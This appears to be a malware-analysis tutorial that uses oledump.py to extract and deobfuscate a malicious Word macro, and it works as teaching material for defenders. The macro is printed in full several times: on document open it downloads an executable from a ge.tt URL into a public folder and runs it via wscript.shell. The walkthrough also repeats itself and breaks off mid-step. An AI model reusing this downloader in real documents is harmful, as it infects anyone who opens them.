Use any of the below tools for analyzing office documents.
oledump.py / officeparser.py / olevba.py / pyOLEScanner.py
1. Find malicious code
2. Extract code / Deobfuscate
3. Analyze code
4. Extract host and network indicators
Microsoft Office Binary File Format Notes
-------- -------- -------- ------- --------- --------
Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.
Data can be “storage” (folder) and “stream” (file).
Excel stores data inside the “workbook” stream.
PowerPoint stores data inside the “PowerPoint Document” stream.
Word stores data inside various streams.
Tools for Analyzing Microsoft Office Files
----------- ---------- ---------- ------------ -------
"OfficeMalScanner" locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.
"MalHost-Setup" extracts shellcode from a given offset in an MS Office file and embeds it an EXE file for further analysis. (Part of OfficeMalScanner).
"Offvis" shows raw contents and structure of an MS Office file, and identifies some common exploits.
"Hachoir-urwid" can navigate through the structure of binary Office files and view stream contents.
"Office Binary Translator" converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).
"pyOLEScanner.py" can examine and decode some aspects of malicious binary Office files.
FileHex (not free) and "FileInsight" hex editors can parse and edit OLE structures.
I.
1. Start analyzing file with # file document
# file 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Output provides a lot of useful information including:
39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin: Composite Document File V2 Document (File format: CDF V2 Document)
Little Endian
Os: Windows,
Version 6.1,
Code page: 1252,
Author: Admin,
Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Tue Jan 13 00:32:00 2015,
Last Saved Time/Date: Thu May 7 04:22:00 2015,
Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0,
Template: Normal, Last Saved By: Raz0r, Revision Number: 198,
2. Next we will examine file with oledump.py
oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).
oledump has an embedded man page: run oledump.py -m to view it.
# oledump.py 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 9602 '1Table'
5: 137803 'Data'
6: 539 'Macros/PROJECT'
7: 71 'Macros/PROJECTwm'
8: M 5258 'Macros/VBA/NewMacros'
9: m 938 'Macros/VBA/ThisDocument'
10: 3483 'Macros/VBA/_VBA_PROJECT'
11: 578 'Macros/VBA/dir'
12: 4096 'WordDocument'
remnux@remnux:~/Desktop/Malicious-files/doc$
[(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)]
One of the cool things about oledump.py is its ability to mark streams that contain VBA code.
In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
remnux@remnux:~/Desktop/Malicious-files/doc$
Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.
Let’s dump it for later comparison with other tools.
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > attribute_code
Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:
$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If
Sub AutoOpen()
Dim loyagdbd As String
Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
Dim NewPath As String
NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
NewPath = "C:\Users\Public\Documents"
Dim CheckNumbers As String
CheckNumbers = ""
Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
Dim NewString As String
NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
Dim LotsofFuckingStringinallinOne As String
LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
Dim AnotherShitisHereSaysthis As String
AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
Dim FinalWord As String
FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)
If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
End If
End Sub
It is safe to say we found our malicious code! We will dump the code for further analysis.
$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > malicious-code
Before we will jump into deobfuscation and code analysis check how above tools cope with the same malicious file.
[ in software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.”]
https://www.upwork.com/hiring/development/understanding-obfuscated-code-deobfuscate-php-javascript/
II.
1. Deobfuscation / Code deobfuscation
Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this,
There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.
I like to rename variables so they start with capital letter informing me about the variable type, for instance:
S_var1 means this variable is of a String type.
This is how code looks like after initial clean up:
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If
Sub AutoOpen()
Dim S_var5 As String
Dim S_var6 As String
S_var6 = CurDir()
Dim NewPath As String
NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
NewPath = "C:\Users\Public\Documents"
Dim CheckNumbers As String
CheckNumbers = ""
Dim S_var7 As String
Dim NewString As String
NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
Dim LotsofFuckingStringinallinOne As String
LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
Dim AnotherShitisHereSaysthis As String
AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
Dim FinalWord As String
FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
S_var10 = S_var9 & S_var8 & ""
S_var11 = S_var10
S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
S_var13 = S_var12
S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)
If Dir(S_var12) <> "" Then
Dim O_var1 As Object
Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
Set O_var1 = O_var1.exec(S_var12)
End If
End Sub
After a few operations code becomes much more readable:-
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If
Sub AutoOpen()
Dim S_var5 As String
Dim S_var6 As String
S_var6 = CurDir()
Dim NewPath As String
NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
NewPath = "C:\Users\Public\Documents"
Dim CheckNumbers As String
CheckNumbers = ""
Dim S_var7 As String
Dim NewString As String
NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
Dim LotsofFuckingStringinallinOne As String
LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
Dim AnotherShitisHereSaysthis As String
AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
Dim FinalWord As String
FinalWord = "wscript."
S_var7 = "SbieCtrl".exe"
S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts"
S_var9 = ""
S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
If Dir(S_var12) <> "" Then
Dim O_var1 As Object
Set O_var1 = CreateObject("wscript.shell")
Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
End If
End Sub
Code analysis summary:
AutoOpen() will be executed after the document is opened.
ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()
URLDownloadToFile() accepts five parameters, including URL address
http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.
Both information serve as a network and host indicators that might be used to check for successful compromise.
oledump.py / officeparser.py / olevba.py / pyOLEScanner.py
1. Find malicious code
2. Extract code / Deobfuscate
3. Analyze code
4. Extract host and network indicators
Microsoft Office Binary File Format Notes
-------- -------- -------- ------- --------- --------
Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.
Data can be “storage” (folder) and “stream” (file).
Excel stores data inside the “workbook” stream.
PowerPoint stores data inside the “PowerPoint Document” stream.
Word stores data inside various streams.
Tools for Analyzing Microsoft Office Files
----------- ---------- ---------- ------------ -------
"OfficeMalScanner" locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.
"MalHost-Setup" extracts shellcode from a given offset in an MS Office file and embeds it an EXE file for further analysis. (Part of OfficeMalScanner).
"Offvis" shows raw contents and structure of an MS Office file, and identifies some common exploits.
"Hachoir-urwid" can navigate through the structure of binary Office files and view stream contents.
"Office Binary Translator" converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).
"pyOLEScanner.py" can examine and decode some aspects of malicious binary Office files.
FileHex (not free) and "FileInsight" hex editors can parse and edit OLE structures.
I.
1. Start analyzing file with # file document
# file 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Output provides a lot of useful information including:
39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin: Composite Document File V2 Document (File format: CDF V2 Document)
Little Endian
Os: Windows,
Version 6.1,
Code page: 1252,
Author: Admin,
Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Tue Jan 13 00:32:00 2015,
Last Saved Time/Date: Thu May 7 04:22:00 2015,
Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0,
Template: Normal, Last Saved By: Raz0r, Revision Number: 198,
2. Next we will examine file with oledump.py
oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).
oledump has an embedded man page: run oledump.py -m to view it.
# oledump.py 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 9602 '1Table'
5: 137803 'Data'
6: 539 'Macros/PROJECT'
7: 71 'Macros/PROJECTwm'
8: M 5258 'Macros/VBA/NewMacros'
9: m 938 'Macros/VBA/ThisDocument'
10: 3483 'Macros/VBA/_VBA_PROJECT'
11: 578 'Macros/VBA/dir'
12: 4096 'WordDocument'
remnux@remnux:~/Desktop/Malicious-files/doc$
[(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)]
One of the cool things about oledump.py is its ability to mark streams that contain VBA code.
In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
remnux@remnux:~/Desktop/Malicious-files/doc$
Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.
Let’s dump it for later comparison with other tools.
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > attribute_code
Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:
$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If
Sub AutoOpen()
Dim loyagdbd As String
Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
Dim NewPath As String
NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
NewPath = "C:\Users\Public\Documents"
Dim CheckNumbers As String
CheckNumbers = ""
Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
Dim NewString As String
NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
Dim LotsofFuckingStringinallinOne As String
LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
Dim AnotherShitisHereSaysthis As String
AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
Dim FinalWord As String
FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)
If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
End If
End Sub
It is safe to say we found our malicious code! We will dump the code for further analysis.
$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > malicious-code
Before we will jump into deobfuscation and code analysis check how above tools cope with the same malicious file.
[ in software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.”]
https://www.upwork.com/hiring/development/understanding-obfuscated-code-deobfuscate-php-javascript/
II.
1. Deobfuscation / Code deobfuscation
Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this,
There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.
I like to rename variables so they start with capital letter informing me about the variable type, for instance:
S_var1 means this variable is of a String type.
This is how code looks like after initial clean up:
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If
Sub AutoOpen()
Dim S_var5 As String
Dim S_var6 As String
S_var6 = CurDir()
Dim NewPath As String
NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
NewPath = "C:\Users\Public\Documents"
Dim CheckNumbers As String
CheckNumbers = ""
Dim S_var7 As String
Dim NewString As String
NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
Dim LotsofFuckingStringinallinOne As String
LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
Dim AnotherShitisHereSaysthis As String
AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
Dim FinalWord As String
FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
S_var10 = S_var9 & S_var8 & ""
S_var11 = S_var10
S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
S_var13 = S_var12
S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)
If Dir(S_var12) <> "" Then
Dim O_var1 As Object
Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
Set O_var1 = O_var1.exec(S_var12)
End If
End Sub
After a few operations code becomes much more readable:-
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If
Sub AutoOpen()
Dim S_var5 As String
Dim S_var6 As String
S_var6 = CurDir()
Dim NewPath As String
NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
NewPath = "C:\Users\Public\Documents"
Dim CheckNumbers As String
CheckNumbers = ""
Dim S_var7 As String
Dim NewString As String
NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
Dim LotsofFuckingStringinallinOne As String
LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
Dim AnotherShitisHereSaysthis As String
AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
Dim FinalWord As String
FinalWord = "wscript."
S_var7 = "SbieCtrl".exe"
S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts"
S_var9 = ""
S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
